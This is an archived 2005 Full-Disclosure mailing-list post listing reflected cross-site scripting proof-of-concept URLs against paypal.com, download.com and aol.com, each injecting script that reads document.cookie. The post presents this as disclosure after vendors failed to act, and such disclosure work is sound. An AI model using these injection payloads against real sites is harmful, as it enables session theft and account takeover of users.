[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Big Sites That Are Vulnerable To XSS

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Big Sites That Are Vulnerable To XSS
From: tuytumadre@xxxxxxx
Date: Thu, 21 Apr 2005 04:19:58 +0000

The following have been previously reposibly disclosed, and, because of the 
lack of action taken on the venders' parts, full disclosure is necessary to 
elliminate the threat of what's called "security by obscurity."

paypal.com
http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside--><script>alert(document.cookie)</script><!--

download.com
http://www.download.com/2001-20_4-0.html?tag=tabasdf"--><script>alert(document.cookie)</script><!--

aol.com*
https://my.screenname.aol.com/snsHomePage.psp?hpClickedOn=null&sitedomain=my.screenname.aol.com";}%20{%20alert(document.cookie);%20//&authLev=2&siteState=&isSiteStateEncoded=false&lang=en&locale=us&mcAuth=%2FBcAG0Jd4zsAAK80AY99uEJd43cIgAwNtLp%2BJCQAAA%3D%3D

*on aol.com, the victim must be logged in to the website screenname service to 
be vulnerable.

Regards,
Paul
Greyhats Security
http://greyhatsecurity.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Big Sites That Are Vulnerable To XSS
  - From: Morning Wood
- Re: [Full-disclosure] Big Sites That Are Vulnerable To XSS
  - From: Jerome ATHIAS

Prev by Date: Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)
Next by Date: [Full-disclosure] File Selection May Lead to Command Execution (GM#015-IE)
Previous by thread: Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broke
Next by thread: Re: [Full-disclosure] Big Sites That Are Vulnerable To XSS
Index(es):
- Date
- Thread